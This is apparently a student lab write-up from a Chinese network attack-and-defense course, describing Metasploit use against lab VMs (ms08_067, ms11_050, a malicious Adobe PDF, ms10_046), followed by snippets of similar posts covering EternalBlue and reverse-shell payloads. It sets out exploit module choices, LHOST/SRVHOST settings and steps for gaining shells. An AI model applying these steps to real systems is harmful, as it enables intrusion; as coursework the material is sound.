20155334 《网络攻防》Exp5 MSF基础应用

一、基础问题回答

  1. 解释exploit,payload,encode是什么:
项目 作用
exploit 是负载有用代码的交通工具,让代码到达目的地,并作用
payload 是有具体功能的代码,能够完成具体的任务
encode 对payload进行再编译,避免让被攻击者知道这是病毒

二、实践总结与体会

怎么说呢,这次实验是学这门课程以来遇到问题最多的一次,虽然不知道后面的实验有木有这么虐心。

苦难越多,意味着收获越多,虽然使用的都是以前的,现在看来已经过时的漏洞,但成功的喜悦还是让我幸福满满。

虽然其中有些项目没有的到完美的结果,但会一直激励我继续前行。

三、实践过程记录

1. 主动攻击:ms08_067

  1. 进入msf, search ms08_067 命令查询针对此漏洞的攻击模块:

  2. 使用 exploit/windows/smb/ms08_067_netapi 模块,并进行设置

  3. 查找可攻击的靶机操作系统型号,发现我的靶机对应的 targets ID=34 是我的学号哎,好巧。

  4. 最后检查设置

  5. 攻击

2. 针对浏览器的攻击:ms11_050

  1. 使用 windows/browser/ms11_050_mshtml_cobjectelement 模块;设置 payload ,并设置需要设置的参数。用 exploit 攻击,会生成一个连接网址:

  2. 在靶机IE上输入该网址:

  3. 成功获取靶机的shell,可以对其进行操作:

3. 针对客户端的攻击:adobe_toolbutton

  1. 选择 windows/fileformat/adobe_cooltype_sing 模块并使用,接下来设置payload攻击载荷,设置必须的参数, exploit !发现在指定目录下生成了一个 pdf 文件:

  2. 将该 pdf 文件粘贴到靶机win xp,在kali中打开并设置监听模块 exploit/multi/handler 再设置IP以及端口

  3. 回到靶机,打开拷贝过去的pdf文件,就可以观察到Kali成功获取了靶机的shell,可以对其进行操作:

4. 快捷方式图标漏洞——MS10_046

  1. 在攻击机kali中进入控制台,使用 exploit/windows/browser/ms10_046_shortcut_icon_dllloader,设置:

    set SRVHOST 192.168.1.108 //攻击机ip
    set LHOST 192.168.1.108 //攻击机ip

  2. 靶机在浏览器访问 http://192.168.1.108:80 ,会弹出一个攻击者IP的目录,其中有一个“快捷方式”的图标:

  3. 靶机打开快捷方式,按照剧本,应该有会话建立,然额,我卡到这里一动不动

  4. 多方查找后未果不得已选择了放弃,然额,应该有张截图,纪念我未成的实验,盗用狄维佳狄老师的截图:

原文地址:https://www.cnblogs.com/bestixx/p/8966817.html

时间: 2024-10-10 05:34:42

20155334 《网络攻防》Exp5 MSF基础应用的相关文章

2018-2019 20165235 网络对抗 Exp5 MSF基础

2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.168.21.128 永恒之蓝漏洞是利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码. 进入msfconsole输入 use exploit/windows/smb/ms17_010_eternalblue.并且通过show payloads 显示可用攻击载荷.

2018-2019 20165221 网络对抗 Exp5 MSF基础

2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms08_067; (1分 一个针对浏览器的攻击,如ms11_050:(1分) 一个针对客户端的攻击,如Adobe:(1分) 成功应用任何一个辅助模块.(0.5分) 具体实验操作 攻击机(kali):192.168.194.128 靶机(win7):192.168.194.129 任务一:主动攻击实践 W

20145306 《网络攻防》 MSF基础应用

20145306张文锦<网络对抗>MSF应用 Adobe阅读器渗透攻击 两台虚拟机,其中一台为kali,一台为windows xp sp3,并保证两台虚拟机可以ping通. 实验过程 进入msfconsole. 输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块;  使用命令set payload windows/meterpreter/reverse_tcp设置攻击载荷;设置端口,主机ip,产生pdf文件名. show

20155338 《网络攻防》Exp5 MSF基础应用

20155338 <网络攻防>Exp5 MSF基础应用 基础问题回答 1. 用自己的话解释什么是exploit,payload,encode? exploit将真正要负责攻击的代码传送到靶机中,相当于载具 payload负责执行相应的攻击代码,相当于载荷 encode是伪装,为了避免payload中坏字符影响功能,相当于编码 实验过程 Windows服务渗透攻击--MS08-067安全漏洞 攻击机:kali,ip:172.30.6.185 靶机:windows XP SP3,IP地址是172.

20155301 《网络攻防》 Exp5 MSF基础应用

20155301 <网络攻防> Exp5 MSF基础应用 基础问题 1.用自己的话解释什么是exploit,payload,encode 答:exploit就是利用一些工具的,用来收集目标靶机的这种漏洞或者个人信息,并可以进行一些比如摄屏.提权等操作. payload就是一个负载,可以负载程序或者数据等到目标靶机,实现攻击. encode是一个加密的工具,可以加密信息或者文件. Windows服务渗透攻击--ms07_029_msdns_zonename 基本信息 1.靶机型号:windows

2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用

2018-2019-2 20165312<网络攻防技术>Exp5 MSF基础应用 目录 一.知识点总结 二.攻击实例 主动攻击的实践 ms08_067 generic/shell_reverse_tcp(成功) windows/meterpreter/reverse_tcp(失败) ms17_010_eternalblue(成功) generic/shell_reverse_tcp windows/x64/meterpreter/reverse_tcp windows/x64/meterpre

2018-2019-2 20165336《网络攻防技术》Exp5 MSF基础应用

2018-2019-2 20165336<网络攻防技术>Exp5 MSF基础应用 一.攻击实例 主动攻击的实践 ms08_067(成功) payload/generic/shell_reverse_tcp(成功) 攻击浏览器的实践 ms11_050(失败) ms11_046(成功) exploit/windows/browser/ms10_046_shortcut_icon_dllloader(成功且唯一) exploit/windows/smb/ms10_046_shortcut_icon_

2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用

2018-2019-2 20165212<网络攻防技术>Exp5 MSF基础应用 攻击成果 主动攻击的实践 ms17010eternalblue payload windows/x64/meterpreter/reverse_tcp(成功) payload generic/shellreversetcp(成功) ms17010psexec(成功且唯一) 攻击浏览器的实践 ms14064olecodeexecution payload windows/meterpreter/reverse_tc

2018-2019-2 20165332《网络攻防技术》Exp5 MSF基础应用

2018-2019-2 20165332<网络攻防技术>Exp5 MSF基础应用 1.基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击,相当于一个载具 payload:就是攻击的代码,是载荷. encode:为了帮助攻击载荷避免被杀软发现,进行伪装. 2.实践总结与体会 在辅助模块这里,可以发现很多旧版本的软件有漏洞,从而可以进行相关的攻击,在此次实验中就体验了旧版本有漏洞的一些软件进行了攻击并且很轻易就实现

2018-2019-2 20165329《网络攻防技术》Exp5 MSF基础应用

2018-2019-2 20165329<网络攻防技术>Exp5 MSF基础应用 一.实验 一个主动攻击实践,ms08_067 ; 一个针对浏览器的攻击,MS11-050 : 一个针对客户端的攻击,Adobe : 成功应用任何一个辅助模块(唯一). 离实战还缺些什么技术感觉大部分是按照教程来做的,离实战还很遥远 用自己的话解释什么是exploit,payload,encode.exploit攻击者对靶机进行渗透攻击的这一过程 payload类似于之前实验中的shellcode,是攻击者进行攻击